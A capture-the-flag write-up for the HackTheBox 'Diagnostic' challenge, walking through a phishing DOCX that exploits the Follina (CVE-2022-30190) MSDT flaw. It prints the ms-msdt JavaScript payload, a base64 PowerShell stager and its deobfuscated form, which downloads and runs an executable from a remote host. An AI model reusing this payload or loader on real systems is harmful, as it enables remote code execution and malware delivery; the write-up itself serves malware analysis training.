Diagnostic - HackTheBox

Description

Our SOC has identified numerous phishing emails coming in claiming to have a document about an upcoming round of layoffs in the company. The emails all contain a link to diagnostic.htb/layoffs.doc. The DNS for that domain has since stopped resolving, but the server is still hosting the malicious document. Take a look and figure out what's going on.

Analysis

This challenge involves analyzing a malicious Office document that exploits CVE-2022-30190 (Follina vulnerability). The attack chain:

1. Phishing email with link to malicious .doc file
2. Document contains external OLE object reference to HTML file
3. HTML file uses ms-msdt:/ protocol handler to execute PowerShell
4. PowerShell payload is base64 encoded and uses format string obfuscation
5. Flag is hidden in the filename of the downloaded malware

Solution

Step 1: Download the malicious document

Since DNS no longer resolves, use Host header to access the server directly:

curl -H "Host: diagnostic.htb" http://94.237.59.242:45434/layoffs.doc -o layoffs.doc

Step 2: Identify file type

file layoffs.doc
# Output: Zip archive data, at least v2.0 to extract

The .doc extension is misleading - this is actually a DOCX file (Office Open XML format, which is a ZIP archive).

Step 3: Extract and analyze document structure

unzip layoffs.doc -d extracted/

Directory structure:

extracted/
├── [Content_Types].xml
├── _rels/
├── docProps/
└── word/
    ├── document.xml
    ├── _rels/
    │   └── document.xml.rels
    └── ...

Step 4: Find external OLE object reference

In word/document.xml, found an OLEObject with suspicious attributes:

• Type="Link" - External reference
• ProgID="htmlfile" - Will be handled by HTML handler
• References rId996

In word/_rels/document.xml.rels:

<Relationship Id="rId996" 
  Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" 
  Target="http://diagnostic.htb/223_index_style_fancy.html!" 
  TargetMode="External"/>

Key indicator: External OLE object pointing to HTML file - classic Follina setup.

Step 5: Download the external HTML payload

curl -H "Host: diagnostic.htb" http://94.237.59.242:45434/223_index_style_fancy.html -o payload.html

Step 6: Analyze the HTML payload

The HTML contains JavaScript that triggers the MSDT protocol handler:

<script>
location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JHtmYGlsZX0gPSAo...base64...'))))))...\"";
</script>

This exploits CVE-2022-30190 (Follina):

• Uses ms-msdt:/ protocol to invoke Microsoft Support Diagnostic Tool
• Passes PowerShell commands via IT_BrowseForFile parameter
• The $() syntax allows command execution within the diagnostic context

Step 7: Decode the base64 PowerShell payload

echo 'JHtmYGlsZX0gPSAoIns3fXsxfXs2fXs4fXs1fXszfXsyfXs0fXswfSItZid9LmV4ZScsJ0J7bXNEdF80c19BX3ByMCcsJ0UnLCdyLi4ucycsJzNNc19iNEQnLCdsMycsJ3RvQycsJ0hUJywnMGxfaDRuRCcpCiYoInsxfXsyfXswfXszfSItZid1ZXMnLCdJbnZva2UnLCctV2ViUmVxJywndCcpICgiezJ9ezh9ezB9ezR9ezZ9ezV9ezN9ezF9ezd9Ii1mICc6Ly9hdScsJy5odGIvMicsJ2gnLCdpYycsJ3RvJywnYWdub3N0JywnbWF0aW9uLmRpJywnL24uZXhlJywndHRwcycpIC1PdXRGaWxlICJDOlxXaW5kb3dzXFRhc2tzXCRmaWxlIgomKCgoIns1fXs2fXsyfXs4fXswfXszfXs3fXs0fXsxfSIgLWYnTDlGVGFza3NMOUYnLCdpbGUnLCdvdycsJ0wnLCdmJywnQzonLCdMOUZMOUZXaW5kJywnOUZrekgnLCdzTDlGJykpICAtQ1JlcGxBY2Una3pIJyxbY2hBcl0zNiAtQ1JlcGxBY2UoW2NoQXJdNzYrW2NoQXJdNTcrW2NoQXJdNzApLFtjaEFyXTkyKQo=' | base64 -d

Decoded (obfuscated PowerShell):

${f`ile} = ("{7}{1}{6}{8}{5}{3}{2}{4}{0}"-f'}.exe','B{msDt_4s_A_pr0','E','r...s','3Ms_b4D','l3','toC','HT','0l_h4nD')
&("{1}{2}{0}{3}"-f'ues','Invoke','-WebReq','t') ("{2}{8}{0}{4}{6}{5}{3}{1}{7}"-f '://au','.htb/2','h','ic','to','agnost','mation.di','/n.exe','ttps') -OutFile "C:\Windows\Tasks\$file"
&((("{5}{6}{2}{8}{0}{3}{7}{4}{1}" -f'L9FTasksL9F','ile','ow','L','f','C:','L9FL9FWind','9FkzH','sL9F'))  -CReplAce'kzH',[chAr]36 -CReplAce([chAr]76+[chAr]57+[chAr]70),[chAr]92)

Step 8: Deobfuscate the PowerShell format strings

PowerShell's -f operator reorders string fragments by index. Using Python to reconstruct:

# Filename reconstruction
parts = ['}.exe', 'B{msDt_4s_A_pr0', 'E', 'r...s', '3Ms_b4D', 'l3', 'toC', 'HT', '0l_h4nD']
order = [7, 1, 6, 8, 5, 3, 2, 4, 0]
filename = ''.join(parts[i] for i in order)
# Result: HTB{msDt_4s_A_pr0toC0l_h4nDl3r...sE3Ms_b4D}.exe

# URL reconstruction
parts2 = ['://au', '.htb/2', 'h', 'ic', 'to', 'agnost', 'mation.di', '/n.exe', 'ttps']
order2 = [2, 8, 0, 4, 6, 5, 3, 1, 7]
url = ''.join(parts2[i] for i in order2)
# Result: https://automation.diagnostic.htb/2/n.exe

Deobfuscated payload behavior:

1. Sets $file to HTB{msDt_4s_A_pr0toC0l_h4nDl3r...sE3Ms_b4D}.exe
2. Downloads malware from https://automation.diagnostic.htb/2/n.exe
3. Saves to C:\Windows\Tasks\<filename>
4. Executes the downloaded file

The flag was hidden in the malware filename!

Key Indicators

Use this technique when you see:

• .doc files that are actually ZIP archives (DOCX format)
• External OLE object references in Office documents
• ProgID="htmlfile" in OLE objects
• ms-msdt:/ protocol in HTML/JavaScript
• Base64 encoded PowerShell payloads
• PowerShell format string obfuscation (-f operator with reordered indices)

Attack Chain Summary

Phishing Email
    ↓
layoffs.doc (DOCX with external OLE reference)
    ↓
223_index_style_fancy.html (JavaScript redirect)
    ↓
ms-msdt:/ protocol handler (CVE-2022-30190)
    ↓
PowerShell execution (base64 + format string obfuscation)
    ↓
Download & execute malware from C2 server

References

• CVE-2022-30190 - Follina
• Microsoft Guidance for Follina
• Office Open XML Format